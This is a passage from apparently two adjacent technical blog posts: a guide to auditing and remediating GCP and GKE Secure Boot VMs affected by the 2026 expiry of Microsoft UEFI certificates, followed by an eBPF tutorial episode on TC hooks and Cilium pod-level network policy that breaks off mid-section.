Role: Authorizes updates to the DB and DBX signature databases.

When the KEK expires, firmware that enforces KEK validity may refuse to accept DB/DBX updates signed by this certificate. This means even if Google pushes an out-of-band UEFI DB update containing the 2023 certs, instances with an expired-only KEK slot may not be able to apply it cleanly.

Replacement: Microsoft Corporation KEK 2K CA 2023


2. Microsoft Corporation UEFI CA 2011 — expires June 27, 2026

Role: Signs third-party bootloaders — specifically the Linux Shim (shim.efi).

This is the most critical cert for Linux workloads. Every major Linux distribution uses a shim bootloader as the first-stage loader in a Secure Boot chain. The shim is signed by Microsoft’s UEFI CA because Linux vendors submit their shim builds to Microsoft for signing (to ensure broad UEFI compatibility). When new shim packages are released signed only by UEFI CA 2023, any VM with only the 2011 cert in its DB will reject them.

Replacement: Microsoft UEFI CA 2023


3. Microsoft Windows Production PCA 2011 — expires October 19, 2026

Role: Signs Windows Boot Manager and other Windows boot components.

Windows instances on GCP using Secure Boot are affected by this cert. Post-expiry Windows OS updates that ship a new Boot Manager binary signed exclusively by the 2023 PCA will fail to boot on instances carrying only the 2011 cert.

Replacement: Windows UEFI CA 2023

Windows-specific signal: Event ID 1801 in the Windows System event log — “Secure Boot CA/keys need to be updated” — will appear by mid-2026 on affected instances, before actual boot failure. This is your warning window.
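
To keep the three deadlines visible in a runbook or a cron report, the remaining days can be computed from the dates above. A minimal sketch, assuming GNU date (for the -d option); days_until is a hypothetical helper name.

```shell
# Print whole days from FROM until TARGET (both YYYY-MM-DD, evaluated in UTC).
# FROM defaults to today. Requires GNU date for the -d option.
days_until() {
    local target="$1" from="${2:-$(date -u +%F)}" t f
    t=$(date -u -d "$target" +%s) || return 1
    f=$(date -u -d "$from" +%s) || return 1
    echo $(( (t - f) / 86400 ))
}
```

Usage: for d in 2026-06-24 2026-06-27 2026-10-19; do echo "$d: $(days_until "$d") days left"; done. A negative number means the date has passed.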


Why GCP Instances Are Specifically Affected

Google’s Compute Engine Shielded VMs ship with a pre-populated UEFI variable database. The content of that database is fixed at instance creation time, as part of the VM’s UEFI firmware image. Instances created before November 7, 2025 have a DB that contains the 2011 certs but not the 2023 replacements. Instances created on or after November 7, 2025 are provisioned with the updated database.

This is not a Google-specific failure. Every cloud provider and on-premises hypervisor platform that uses Secure Boot with a pre-populated UEFI DB has the same problem. GCP is ahead of many platforms in actually documenting it.


GKE Shielded Nodes: The Operational Blind Spot

GKE’s Shielded Nodes feature enables Secure Boot on node pool VMs. Each node is a Compute Engine instance — and all the same rules apply.

The risk: Node pools whose nodes were last provisioned before November 7, 2025 carry the old UEFI database. Node auto-upgrade and manual node pool upgrades replace node VMs, and the replacement VMs carry the updated certs. Nodes that haven’t been replaced since before the cutoff are still sitting on the old DB.

GKE auto-upgrade helps — but only if it’s actually running and has completed at least one full node replacement cycle since November 7, 2025.

Node pools with auto-upgrade disabled, or clusters in maintenance windows that delayed upgrades, are at risk.

The trigger scenario:
1. GKE runs a node OS update in-place on an old node (not a full node replacement)
2. The update upgrades the shim package to a version signed only by UEFI CA 2023
3. Next reboot: the node fails to boot
4. The node is marked NotReady, workloads are rescheduled — but the underlying VM is stuck


Detecting Affected Resources

Compute Engine Instances

gcloud compute instances list \
  --filter="creationTimestamp < '2025-11-07' AND shieldedInstanceConfig.enableSecureBoot=true" \
  --format="table(name,zone,creationTimestamp,shieldedInstanceConfig.enableSecureBoot,status)"

Sample output:

NAME               ZONE           CREATION_TIMESTAMP        ENABLE_SECURE_BOOT  STATUS
prod-api-01        us-central1-a  2024-08-15T10:22:00Z      True                RUNNING   ← at risk
prod-db-02         us-central1-b  2023-11-01T08:15:00Z      True                RUNNING   ← at risk
prod-web-03        us-central1-a  2025-12-01T14:30:00Z      True                RUNNING   ← safe (post-Nov 7)
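
The at-risk/safe annotation in that sample is just a date comparison against the cutoff, which can be scripted for larger inventories. A minimal sketch; secure_boot_risk is a hypothetical helper, and it compares only the date part of the timestamp, so instances created on the cutoff day itself are treated as safe.

```shell
# Classify a creationTimestamp (RFC 3339) against the cutoff date.
# Usage: secure_boot_risk TIMESTAMP [CUTOFF_DATE]   (cutoff defaults to 2025-11-07)
secure_boot_risk() {
    local created cutoff
    # Keep the date part only and drop the dashes so the values compare as integers.
    created=$(printf '%s' "${1%%T*}" | sed 's/-//g')
    cutoff=$(printf '%s' "${2:-2025-11-07}" | sed 's/-//g')
    if [ "$created" -lt "$cutoff" ]; then
        echo "at-risk"
    else
        echo "ok"
    fi
}
```

Usage: gcloud compute instances list --filter="shieldedInstanceConfig.enableSecureBoot=true" --format="value(name,creationTimestamp)" | while read -r name ts; do echo "$name $(secure_boot_risk "$ts")"; done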

GKE Node Pools

# List node pools with Secure Boot enabled per cluster
gcloud container clusters list --format="value(name,location)" | while read -r NAME LOCATION; do
  echo "=== Cluster: $NAME ($LOCATION) ==="
  gcloud container node-pools list \
    --cluster="$NAME" \
    --location="$LOCATION" \
    --filter="config.shieldedInstanceConfig.enableSecureBoot=true" \
    --format="table(name,config.shieldedInstanceConfig.enableSecureBoot,management.autoUpgrade)"
done

Then verify node creation timestamps within affected pools:

gcloud compute instances list \
  --filter="labels.goog-gke-node:* AND creationTimestamp < '2025-11-07' AND shieldedInstanceConfig.enableSecureBoot=true" \
  --format="table(name,zone,creationTimestamp,labels.goog-gke-node)"

Checking the UEFI DB on a Running Instance

SSH into an affected instance and verify which certs are in the DB:

# On the instance (requires mokutil and/or efitools)
sudo mokutil --db | grep -A3 "Subject:"

Look for CN=Microsoft UEFI CA 2023 in the output. Its absence means your instance has only the 2011 certs.

On GKE nodes (where you have node shell access via a DaemonSet or node debug pod):

# Using kubectl debug for node access
kubectl debug node/NODE_NAME -it --image=ubuntu -- bash
# Then inside the debug pod:
chroot /host
mokutil --db 2>/dev/null | grep "Microsoft.*2023" || echo "2023 cert NOT present — node at risk"
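
When checking many instances, it helps to turn the mokutil output into an explicit present/missing report. A minimal sketch that reads the mokutil --db text on stdin; check_db_certs is a hypothetical helper, and the certificate names to look for are passed in as arguments rather than hard-coded.

```shell
# Read `mokutil --db` output on stdin and report each named certificate.
# Returns non-zero if any of the names is missing.
check_db_certs() {
    local db cn missing=0
    db=$(cat)
    for cn in "$@"; do
        if printf '%s\n' "$db" | grep -qF -- "$cn"; then
            echo "present: $cn"
        else
            echo "MISSING: $cn"
            missing=1
        fi
    done
    return "$missing"
}
```

Usage: sudo mokutil --db | check_db_certs "Microsoft UEFI CA 2023" exits non-zero on an instance that still carries only the 2011 certs, which makes it easy to use in a fleet-wide loop.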

Solutions

Option 1: Recreate Affected Instances (Recommended)

Instances created on or after November 7, 2025 automatically receive the updated UEFI certificate database. The simplest fix is to recreate affected instances.

For Compute Engine:

# Step 1: Create a machine image (snapshot) of the existing instance
gcloud compute machine-images create INSTANCE_NAME-backup \
  --source-instance=INSTANCE_NAME \
  --source-instance-zone=ZONE

# Step 2: Delete the old instance (after verifying backup)
gcloud compute instances delete INSTANCE_NAME --zone=ZONE

# Step 3: Create new instance from machine image
gcloud compute instances create INSTANCE_NAME \
  --source-machine-image=INSTANCE_NAME-backup \
  --zone=ZONE \
  --shielded-secure-boot \
  --shielded-vtpm \
  --shielded-integrity-monitoring

The new instance will have the post-November 7, 2025 UEFI DB.

For GKE Node Pools:

# Option A: Upgrade the node pool (triggers node recreation)
gcloud container clusters upgrade CLUSTER_NAME \
  --location=LOCATION \
  --node-pool=NODE_POOL_NAME

# Option B: Recreate the node pool entirely
gcloud container node-pools create NODE_POOL_NAME-new \
  --cluster=CLUSTER_NAME \
  --location=LOCATION \
  --shielded-secure-boot \
  --shielded-integrity-monitoring \
  [... your existing pool config ...]

# Then cordon and drain the old pool nodes
kubectl cordon NODE_NAME
kubectl drain NODE_NAME --ignore-daemonsets --delete-emptydir-data

# Finally delete the old node pool
gcloud container node-pools delete NODE_POOL_NAME \
  --cluster=CLUSTER_NAME \
  --location=LOCATION

Option 2: Disable Secure Boot Temporarily (Emergency Workaround)

If an instance has already failed to boot after an OS update, or if you need to apply bootloader updates before recreating the instance:

# Stop the instance first (Shielded VM options can only be changed while it is stopped)
gcloud compute instances stop INSTANCE_NAME --zone=ZONE

# Disable Secure Boot on the stopped instance
gcloud compute instances update INSTANCE_NAME \
  --zone=ZONE \
  --no-shielded-secure-boot

# Start the instance
gcloud compute instances start INSTANCE_NAME --zone=ZONE

# SSH in, apply OS updates and any pending bootloader upgrades
# (The system will boot without Secure Boot enforcement)
sudo apt-get update && sudo apt-get upgrade -y   # Debian/Ubuntu
# or
sudo dnf update -y                                # RHEL/CentOS

# Stop the instance again
gcloud compute instances stop INSTANCE_NAME --zone=ZONE

# Re-enable Secure Boot
gcloud compute instances update INSTANCE_NAME \
  --zone=ZONE \
  --shielded-secure-boot

# Start again. This boot succeeds only if the installed bootloader is signed
# by a cert that is in this instance's DB (check with mokutil --db beforehand)
gcloud compute instances start INSTANCE_NAME --zone=ZONE

Note: This workaround doesn’t add the 2023 certs to the DB. It bypasses Secure Boot enforcement temporarily, and the underlying UEFI DB still only has the 2011 certs. If the updated bootloader is signed only by the 2023 certs, it will be rejected again as soon as Secure Boot is re-enabled. You still need to recreate the instance to get the updated DB; this is only a bridge to keep the instance alive while you plan migration.


Option 3: Restore from Machine Image

If an instance is already in a boot failure state and the workaround above doesn’t apply:

# List available machine images
gcloud compute machine-images list

# Restore from a pre-failure machine image
gcloud compute instances create INSTANCE_NAME-restored \
  --source-machine-image=MACHINE_IMAGE_NAME \
  --zone=ZONE

Then immediately plan to recreate the workload on an instance created after November 7, 2025.


vTPM, BitLocker, and Full Disk Encryption: The Hidden Risk

For VMs using Shielded VM features beyond just Secure Boot — specifically vTPM with sealed secrets — certificate expiry creates a more dangerous failure mode.

How vTPM sealing works:

  Boot sequence measurements → PCR registers (PCR 0–7 for UEFI, PCR 8–15 for OS)
         │
         ▼
  TPM seals secrets (FDE key, BitLocker key) to specific PCR values
         │
         ▼
  On next boot: PCR values must match for TPM to release the key
         │
         ▼
  If Secure Boot state changes (cert DB changes, Secure Boot disabled) →
  PCR values change → TPM refuses to unseal → FDE fails → disk inaccessible
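
The sealing flow above can be sketched in a few lines. This is a simplified model rather than a real TPM interface: the event labels are made up for illustration, a single SHA-256 PCR stands in for the whole bank, and a real TPM enforces the comparison through a policy session instead of a plain equality check.

```python
import hashlib

PCR_SIZE = 32  # one register in a SHA-256 PCR bank


def extend(pcr: bytes, measurement: bytes) -> bytes:
    """TPM-style extend: new PCR = SHA-256(old PCR || SHA-256(measurement))."""
    return hashlib.sha256(pcr + hashlib.sha256(measurement).digest()).digest()


def boot(measurements) -> bytes:
    """Replay a boot: start from an all-zero PCR and extend it once per event."""
    pcr = bytes(PCR_SIZE)
    for m in measurements:
        pcr = extend(pcr, m)
    return pcr


def unseal(sealed_to: bytes, current_pcr: bytes, secret: bytes):
    """Release the secret only if the current PCR equals the value it was sealed to."""
    return secret if current_pcr == sealed_to else None


# Hypothetical event labels standing in for real firmware measurements.
normal_boot = [b"SecureBoot=enabled", b"db=2011-certs", b"shim-v1"]
sealed_pcr = boot(normal_boot)

same_boot = boot(normal_boot)
disabled_boot = boot([b"SecureBoot=disabled", b"db=2011-certs", b"shim-v1"])

key_ok = unseal(sealed_pcr, same_boot, b"luks-volume-key")          # released
key_denied = unseal(sealed_pcr, disabled_boot, b"luks-volume-key")  # None
```

Because each extend hashes the previous register value, a single changed event anywhere in the sequence produces a different final PCR, which is why toggling Secure Boot is enough to lock the disk.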

What this means in practice:

  • Linux FDE (LUKS with TPM2 unsealing): If Secure Boot fails or is temporarily disabled per the workaround above, the TPM will not release the LUKS volume key. The system will drop to a recovery prompt. You need the LUKS recovery passphrase.

  • Windows BitLocker: If PCR values shift (Secure Boot disabled, cert DB changed), BitLocker enters recovery mode. The VM prompts for the BitLocker recovery key on next boot. Without it, the volume is inaccessible.

  • Windows Virtual Secure Mode: VSM uses vTPM to protect credentials. If Secure Boot state changes, VSM-protected secrets become inaccessible until re-enrollment.

Action before any changes:

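# For Linux: inspect the key slots and confirm a passphrase slot exists alongside the TPM2 one
# (LUKS1 prints "Key Slot N" lines, LUKS2 prints a "Keyslots:" section)
sudo cryptsetup luksDump /dev/sda3
# Then verify that the recovery passphrase you hold actually unlocks the volume
sudo cryptsetup open --test-passphrase /dev/sda3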

# For Windows: export BitLocker recovery key before touching Secure Boot state
# (Do this from within the running Windows instance via PowerShell)
Get-BitLockerVolume | Select-Object -ExpandProperty KeyProtector | Where-Object {$_.KeyProtectorType -eq "RecoveryPassword"}

Store recovery keys in Secret Manager, not just locally:

# Store LUKS key in GCP Secret Manager
echo -n "YOUR_RECOVERY_KEY" | gcloud secrets create luks-recovery-INSTANCE_NAME \
  --data-file=- \
  --replication-policy=automatic

⚠ Production Gotchas

1. OS update automation is the trigger, not the cert expiry date itself.
The certs don’t enforce anything at runtime. The actual failure happens when an unattended-upgrade, yum-cron, or GKE node OS update pulls in a new shim/Boot Manager binary signed only by the 2023 cert. Instances may fail to boot weeks or months before the official cert expiry date if distros ship updated bootloaders early.

2. GKE surge upgrades can mask the problem — temporarily.
During a node pool upgrade, GKE creates new nodes (with updated certs) before draining old ones. Workloads move to new nodes. The old nodes get deleted. This looks fine — until you realize some in-place operations (node taints, label changes, manual kubelet restarts) could force old nodes to reboot without triggering node replacement.

3. Disabling Secure Boot changes vTPM PCR values — plan FDE recovery before touching anything.
The temporary workaround (disable Secure Boot) will invalidate TPM-bound disk encryption. Have recovery keys ready before running --no-shielded-secure-boot.

4. Windows Event ID 1801 is an early warning — act on it.
If you see this event in your Windows Compute Engine instances before June 2026, that instance has already identified itself as carrying the old certs. Use it as your automated detection signal in Cloud Logging.

# Query Cloud Logging for Event ID 1801 across Windows instances
gcloud logging read 'resource.type="gce_instance" AND jsonPayload.EventID=1801' \
  --format="table(resource.labels.instance_id,timestamp,jsonPayload.Message)" \
  --limit=50

5. Instance templates can propagate the old DB.
If you use instance templates or managed instance groups (MIGs) to create VMs, and those templates were created before November 7, 2025, new instances created from them may or may not inherit updated certs depending on how the template configures the UEFI DB. Verify by checking the creation timestamp of the resulting instance, not of the template.

6. Custom OS images don’t fix this.
Importing a custom image or using a custom OS does not update the UEFI certificate database. The DB is part of the VM’s UEFI firmware state, not the OS disk image. Recreating the instance is the only reliable path.
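
For the per-instance check described in gotcha 5, a small script can apply the same rule as the audit filter to the JSON output of gcloud compute instances list --format=json. This is a sketch under assumptions: the sample records are invented, and the cutoff is interpreted as midnight UTC on November 7, 2025.

```python
import json
from datetime import datetime, timezone

# Assumption: the cutoff date is treated as midnight UTC.
CUTOFF = datetime(2025, 11, 7, tzinfo=timezone.utc)


def is_affected(instance: dict) -> bool:
    """True if the VM has Secure Boot enabled and was created before the cutoff."""
    created = datetime.fromisoformat(instance["creationTimestamp"])
    shielded = instance.get("shieldedInstanceConfig", {})
    return bool(shielded.get("enableSecureBoot", False)) and created < CUTOFF


# Invented sample shaped like `gcloud compute instances list --format=json` output.
SAMPLE = """
[
  {"name": "web-1", "creationTimestamp": "2025-06-02T09:15:00.000-07:00",
   "shieldedInstanceConfig": {"enableSecureBoot": true}},
  {"name": "web-2", "creationTimestamp": "2025-12-01T10:00:00.000-08:00",
   "shieldedInstanceConfig": {"enableSecureBoot": true}},
  {"name": "batch-1", "creationTimestamp": "2024-03-11T18:30:00.000-07:00",
   "shieldedInstanceConfig": {"enableSecureBoot": false}}
]
"""

affected = [vm["name"] for vm in json.loads(SAMPLE) if is_affected(vm)]
print(affected)
```

Running this against instances created by a MIG after a template change shows directly whether the resulting VMs still fall on the wrong side of the cutoff.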


Quick Reference: Commands

| Task | Command |
| --- | --- |
| List affected Compute Engine VMs | gcloud compute instances list --filter="creationTimestamp < '2025-11-07' AND shieldedInstanceConfig.enableSecureBoot=true" |
| Check UEFI DB on a Linux VM | sudo mokutil --db \| grep -E "Subject\|Not After" |
| Check for 2023 cert presence | mokutil --db 2>/dev/null \| grep "Microsoft.*2023" \|\| echo "2023 cert absent" |
| Disable Secure Boot (emergency) | gcloud compute instances update INSTANCE --zone=ZONE --no-shielded-secure-boot |
| Re-enable Secure Boot | gcloud compute instances update INSTANCE --zone=ZONE --shielded-secure-boot |
| Find affected GKE nodes | gcloud compute instances list --filter="labels.goog-gke-node:* AND creationTimestamp < '2025-11-07' AND shieldedInstanceConfig.enableSecureBoot=true" |
| Trigger GKE node pool upgrade | gcloud container clusters upgrade CLUSTER --location=LOCATION --node-pool=POOL |
| Store LUKS key in Secret Manager | echo -n "KEY" \| gcloud secrets create NAME --data-file=- |
| Query Windows Event 1801 in Logging | gcloud logging read 'resource.type="gce_instance" AND jsonPayload.EventID=1801' |
| Create machine image backup | gcloud compute machine-images create BACKUP --source-instance=INSTANCE --source-instance-zone=ZONE |

Framework Alignment

| Framework | Domain | Relevance |
| --- | --- | --- |
| CISSP | Domain 7: Security Operations | Patch management, boot integrity, incident response |
| CISSP | Domain 3: Security Architecture | Secure Boot trust chain, TPM integration, cryptographic key lifecycle |
| NIST CSF 2.0 | ID.AM, PR.PS | Asset inventory of affected VMs; platform security (integrity protection of the boot chain) |
| CIS Benchmarks | CIS Google Cloud Computing Foundations | Shielded VM controls, vTPM configuration |
| OWASP Top 10 | A05: Security Misconfiguration | Failure to maintain certificate currency in security-critical infrastructure |

Key Takeaways

  • The expiry of three Microsoft UEFI CA certificates in 2026 creates a window where GCP VMs with Secure Boot enabled — created before November 7, 2025 — will fail to boot after pulling in new bootloader packages
  • The failure is not instantaneous on the cert expiry date. It’s triggered by the next OS update that ships a bootloader signed exclusively by the 2023 replacement certs
  • GKE Shielded Nodes are affected through the same mechanism: node VMs that haven’t been recreated since November 7, 2025 carry the old UEFI database
  • vTPM-sealed secrets (FDE, BitLocker, VSM) add a secondary failure mode if Secure Boot state is changed as part of remediation — have recovery keys before touching anything
  • Google’s recommended fix is instance recreation. The workaround (disable Secure Boot temporarily) keeps instances alive but doesn’t fix the underlying DB — treat it as a bridge, not a resolution
  • Audit now, before June 24, 2026. The command is one line. The blast radius of missing this is a production boot failure at 2 AM after a routine security patch run

What’s Next

If you’re running Shielded VMs in production, this certificate expiry is the kind of quiet deadline that fails silently — not with an alarm, but with a VM that doesn’t come back after a patch cycle. The time to audit is before your automated patching runs, not after.


TC eBPF — Pod-Level Network Policy Without iptables

Reading Time: 10 minutes

eBPF: From Kernel to Cloud, Episode 8
What Is eBPF? · The BPF Verifier · eBPF vs Kernel Modules · eBPF Program Types · eBPF Maps · CO-RE and libbpf · XDP · TC eBPF


Architecture Overview

[Figure: TC eBPF and Cilium traffic control hook architecture, showing ingress/egress packet flow with sk_buff context]
The TC hook runs inside the kernel network stack — Cilium uses it for identity-based policy enforcement.

TL;DR

  • TC eBPF fires after sk_buff allocation — it has socket metadata, cgroup ID, and pod identity that XDP lacks
    (sk_buff = the kernel’s socket buffer, allocated for every packet; TC fires after this allocation, so it can read socket and process identity)
  • Direct action (DA) mode combines filter and action; the program’s return value is the packet fate
  • Multiple TC programs chain on the same hook ordered by priority — stale programs from Cilium upgrades cause silent policy conflicts
  • tc filter show dev <iface> ingress/egress is the primary inspection tool; bpftool net list shows the full node picture
  • XDP + TC is the Cilium data path: XDP for pre-stack service load balancing, TC for per-pod identity-based enforcement
  • TC can modify packet content (bpf_skb_store_bytes) — the basis for TC-based DNAT and packet mangling

TC eBPF is where Cilium implements pod-level network policy without iptables — the hook that fires after sk_buff allocation, where socket and cgroup context exist, making per-pod enforcement possible. The obvious follow-up to XDP is why Cilium doesn’t use it for everything — pod network policy, egress enforcement, the full NetworkPolicy ruleset. The answer reveals an inherent trade-off built into the Linux data path: XDP’s speed comes from running before any context exists. At the moment it fires, there is no socket, no cgroup, no way to tell which pod sent the packet. The moment you need pod identity, you need a hook that fires later — and pays for it.


A specific pod in production was experiencing intermittent TCP connection failures to an external service. Not all connections — roughly one in fifty. Kubernetes NetworkPolicy showed egress allowed for the namespace. Cilium policy status showed no violations. Running curl from inside the pod worked fine.

The application logs told a different story: connection timeouts at the 30-second mark, no SYN-ACK received. Not a DNS issue — I verified with tcpdump inside the pod namespace. SYN packets were leaving the pod network namespace. They weren’t making it onto the wire.

I ran bpftool net list on the node and saw two TC egress programs attached to that pod’s veth interface. One from the current Cilium version (installed six weeks ago). One from the previous version — from before the rolling upgrade. Two programs. Different policy epochs. The older one had a stale block rule that fired intermittently based on connection tuple patterns it was never designed to handle in the new policy model.

Without understanding TC eBPF — what programs attach where, how multiple programs interact, and how to inspect them — I would have kept chasing ghosts in the application layer.

Quick Check: Are There Stale TC Filters on Your Cluster?

The most common TC eBPF issue on production clusters — stale filters left behind by a Cilium upgrade — is a two-command check:

# SSH into a worker node, then pick any pod's veth interface:
ip link | grep lxc | head -5
# lxc8a3f21b@if7: ...
# lxc2c9d3e1@if9: ...

# Check TC filters on that interface
tc filter show dev lxc8a3f21b egress

Healthy output (one filter, one priority):

filter protocol all pref 1 bpf chain 0
filter protocol all pref 1 bpf chain 0 handle 0x1 cil_to_container direct-action not_in_hw id 44

Stale filter present (two priorities = problem):

filter protocol all pref 1 bpf chain 0
filter protocol all pref 1 bpf chain 0 handle 0x1 cil_to_container direct-action not_in_hw id 44
filter protocol all pref 2 bpf chain 0
filter protocol all pref 2 bpf chain 0 handle 0x1 old_cil_to_container direct-action not_in_hw id 17
#                  ^^^^^^ two different priorities = two programs running in sequence

Two priorities on the same hook means two programs are attached, and the second one runs whenever the first hands the packet on instead of issuing a final verdict. If the older one has a stale DROP rule, packets are dropped intermittently, and nothing in the application layer will tell you why.
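
To run this check across many interfaces, the tc filter show output can be parsed mechanically. The sketch below assumes the line format shown in the samples above (a pref number, then a program name between the handle and direct-action); the function names are illustrative, and output from other tc versions may need a different pattern.

```python
import re

PREF_RE = re.compile(r"\bpref (\d+)\b")
PROG_RE = re.compile(r"handle \S+ (\S+) direct-action")


def programs_by_pref(tc_output: str) -> dict:
    """Map each filter priority to the BPF program names attached at it."""
    progs = {}
    for line in tc_output.splitlines():
        pref = PREF_RE.search(line)
        if not pref:
            continue  # comments or unrelated lines
        names = progs.setdefault(int(pref.group(1)), [])
        prog = PROG_RE.search(line)
        if prog:
            names.append(prog.group(1))
    return progs


def has_stale_candidate(tc_output: str) -> bool:
    """More than one priority on a hook is worth a manual look."""
    return len(programs_by_pref(tc_output)) > 1


HEALTHY = """\
filter protocol all pref 1 bpf chain 0
filter protocol all pref 1 bpf chain 0 handle 0x1 cil_to_container direct-action not_in_hw id 44
"""

STALE = HEALTHY + """\
filter protocol all pref 2 bpf chain 0
filter protocol all pref 2 bpf chain 0 handle 0x1 old_cil_to_container direct-action not_in_hw id 17
"""

print(programs_by_pref(STALE))
print(has_stale_candidate(HEALTHY), has_stale_candidate(STALE))
```

Feeding it the captured output of tc filter show for each lxc interface gives a per-node list of veths that deserve a closer look.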

Not running Cilium? If you’re on a non-Cilium CNI (Calico, Flannel, aws-vpc-cni), you likely won’t have TC eBPF filters on pod interfaces. Run tc filter show dev eth0 ingress on the node uplink instead to see if any TC programs are attached at the node level. An empty response is normal for non-Cilium clusters.

Why TC, Not XDP

EP07 covered XDP: fastest possible hook, fires before sk_buff, drops at line rate. If XDP is so fast, why doesn’t Cilium use it for everything?

Because XDP sees only raw packet bytes. No socket. No cgroup. No pod identity.

In Kubernetes, network policy is inherently about identity. “Allow pod A to connect to pod B on port 8080.” To enforce this, you need to know which pod a packet is coming from on egress — and which pod it’s going to on ingress. That mapping lives in the cgroup hierarchy and the socket buffer, neither of which exist at XDP time.

TC fires later in the packet lifecycle, after sk_buff is allocated and populated:

Ingress path:
  wire → NIC → [XDP hook] → sk_buff allocated → [TC ingress hook] → netfilter → socket

Egress path:
  socket → IP routing → [TC egress hook] → qdisc → NIC → wire

At the TC egress hook on a pod’s veth interface, the sk_buff carries the socket that created the packet — and from that socket you can read the cgroup ID. The cgroup hierarchy maps container → pod, so the TC program knows which pod this traffic belongs to. That’s what makes pod-level enforcement possible.

The Linux Traffic Control Architecture

tc (traffic control) is the Linux subsystem for managing packet queues and scheduling. Most Linux administrators know it as the bandwidth-shaping tool:

# Classic tc usage — rate limit an interface
tc qdisc add dev eth0 root tbf rate 100mbit burst 32kbit latency 400ms

The qdisc (queuing discipline) is the primary abstraction. Under the qdisc sits a filter layer — and the filter type relevant to eBPF is cls_bpf, which attaches eBPF programs as packet classifiers.

qdisc (queuing discipline) is the kernel’s packet scheduler for an interface — it controls how packets are buffered and in what order they leave. For eBPF policy enforcement, Cilium uses a special qdisc called clsact which has no buffering behaviour at all; it purely provides the ingress and egress hook points where eBPF filters attach. If a pod veth doesn’t have clsact, Cilium isn’t enforcing policy on that pod.

Cilium attaches cls_bpf filters in direct action (DA) mode, which combines classifier and action into a single eBPF program. The program’s return value is the packet fate directly:

| Return value | Action |
| --- | --- |
| TC_ACT_OK (0) | Pass the packet |
| TC_ACT_SHOT (2) | Drop the packet |
| TC_ACT_REDIRECT (7) | Redirect to another interface |
| TC_ACT_PIPE (3) | Pass to the next filter in the chain |

TC Context: What Your Program Can See

TC programs receive a struct __sk_buff — a safe, BPF-accessible projection of the kernel sk_buff. Unlike the raw packet bytes in XDP, __sk_buff includes metadata:

struct __sk_buff {
    __u32 len;           // packet length
    __u32 pkt_type;      // PACKET_HOST, PACKET_BROADCAST, etc.
    __u32 mark;          // skb->mark — used by Cilium for pod identity
    __u32 queue_mapping;
    __u32 protocol;      // ETH_P_IP, ETH_P_IPV6, etc.
    __u32 vlan_present;
    __u32 vlan_tci;
    __u32 vlan_proto;
    __u32 priority;
    __u32 ingress_ifindex;
    __u32 ifindex;
    __u32 tc_index;
    __u32 cb[5];
    __u32 hash;
    __u32 tc_classid;
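    __u32 data;          // start of packet data (used as a pointer in BPF C)
    __u32 data_end;      // end of packet data; bounds-check every access against it
    __u32 napi_id;
    // The fields from family through local_port are meant for sk_skb programs;
    // TC programs parse addresses and ports from the packet bytes instead.
    __u32 family;
    __u32 remote_ip4;    // network byte order
    __u32 local_ip4;     // network byte order
    __u32 remote_ip6[4];
    __u32 local_ip6[4];
    __u32 remote_port;
    __u32 local_port;
    // ...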
};

skb->mark is how Cilium passes pod identity between its hook points.

skb->mark is a 32-bit field in every sk_buff that any kernel subsystem can read or write. It’s a general-purpose scratch field — iptables uses it, routing rules use it, and Cilium uses it to carry pod security identity from the socket hook through to TC enforcement. When Cilium stamps a pod’s identity into skb->mark at connection time, every subsequent TC filter on that packet’s path can read it without another identity lookup. The socket-level cgroup hook (cgroup_sock_addr) stamps the cgroup-derived pod identity into skb->mark when the socket calls connect(). By the time the packet reaches the TC egress hook, skb->mark carries the pod’s security identity — and the TC program uses it for policy enforcement.

What Cilium’s TC Filters Actually Do

The TC filter on each pod’s veth is Cilium’s enforcement point for Kubernetes NetworkPolicy. The mechanism:

  1. When a pod opens a connection, a cgroup_sock_addr hook stamps the pod’s security identity (derived from its labels + namespace) into skb->mark
  2. The TC egress filter on the veth reads skb->mark, looks up the pod identity + destination in the policy map, and returns TC_ACT_SHOT (drop) or TC_ACT_OK (pass)
  3. The TC ingress filter on the receiving pod’s veth does the same check for inbound traffic

The policy map is a per-endpoint BPF map keyed on the peer's security identity, destination port, protocol, and traffic direction. This is what cilium bpf policy get reads from, and what bpftool map dump shows directly:

# Find Cilium's policy maps
bpftool map list | grep -i policy

# Dump the active policy entries for a specific endpoint
# Get endpoint ID from: cilium endpoint list
cilium bpf policy get <endpoint-id>

# Cross-check with raw bpftool dump
bpftool map dump id <POLICY_MAP_ID> | head -30

The clsact qdisc is the prerequisite for any TC eBPF filter — it creates the ingress and egress hook points without any queuing behavior. Every pod veth on a Cilium node has one:

tc qdisc show dev lxcABCDEF
# qdisc clsact ffff: dev lxcABCDEF parent ffff:fff1
# ^^^^^^^^^^^^ this line confirms Cilium's hook points exist on this pod's veth
# If this is missing: Cilium is NOT enforcing NetworkPolicy on this pod

If a pod veth doesn’t show clsact, Cilium isn’t enforcing policy on that pod.

Multiple Programs and the Filter Chain

This is the detail that caused my production incident.

TC supports chaining multiple filters on the same hook, ordered by priority. Lower priority number runs first. When Cilium upgrades, it installs a new filter at a new priority before removing the old one. If the upgrade procedure has any timing gap — or if the removal step fails silently — you end up with two programs running in sequence.

# Show all TC filters on a pod's veth — both priorities visible
tc filter show dev lxc12345 egress

# Example output with a stale filter:
filter protocol all pref 1 bpf chain 0
filter protocol all pref 1 bpf chain 0 handle 0x1 cil_to_container direct-action not_in_hw id 44
filter protocol all pref 2 bpf chain 0
filter protocol all pref 2 bpf chain 0 handle 0x1 old_cil_to_container direct-action not_in_hw id 17

Two programs. Pref 1 runs first. Pref 2 runs second, but only if pref 1 hands the packet on. In cls_bpf direct-action mode, TC_ACT_SHOT and TC_ACT_OK are both final verdicts: the packet is dropped or accepted and later filters never fire. TC_ACT_UNSPEC (-1) or TC_ACT_PIPE tells the kernel to continue with the next filter.

In my incident: pref 1 was the current Cilium version with correct policy, and it passed the traffic in question on to the next filter rather than ending classification. Pref 2 was the old version with a stale block entry, returning TC_ACT_SHOT for a subset of connection tuples. Because pref 1's verdict was not final, pref 2 got to run, and intermittently dropped packets.

The fix:

# Remove the stale filter by priority
tc filter del dev lxc12345 egress pref 2

# Verify only the current filter remains
tc filter show dev lxc12345 egress

This should be part of any post-upgrade verification for Cilium-managed clusters.

How Cilium Uses TC Across the Full Node

Cilium’s TC deployment on a node:

Pod veth (host-side, lxcXXXXX):
  TC ingress: cil_from_container — L3/L4 policy on the pod's outbound traffic
  TC egress:  cil_to_container   — L3/L4 policy on traffic arriving at the pod

Node uplink (eth0):
  TC ingress: cil_from_netdev    — traffic arriving from outside the node
  TC egress:  cil_to_netdev      — traffic leaving the node

XDP on eth0:
  cil_xdp_entry — pre-stack service load balancing (DNAT for NodePort/LoadBalancer traffic)

The naming is counterintuitive at first: cil_from_container is attached to the TC ingress hook on the veth.

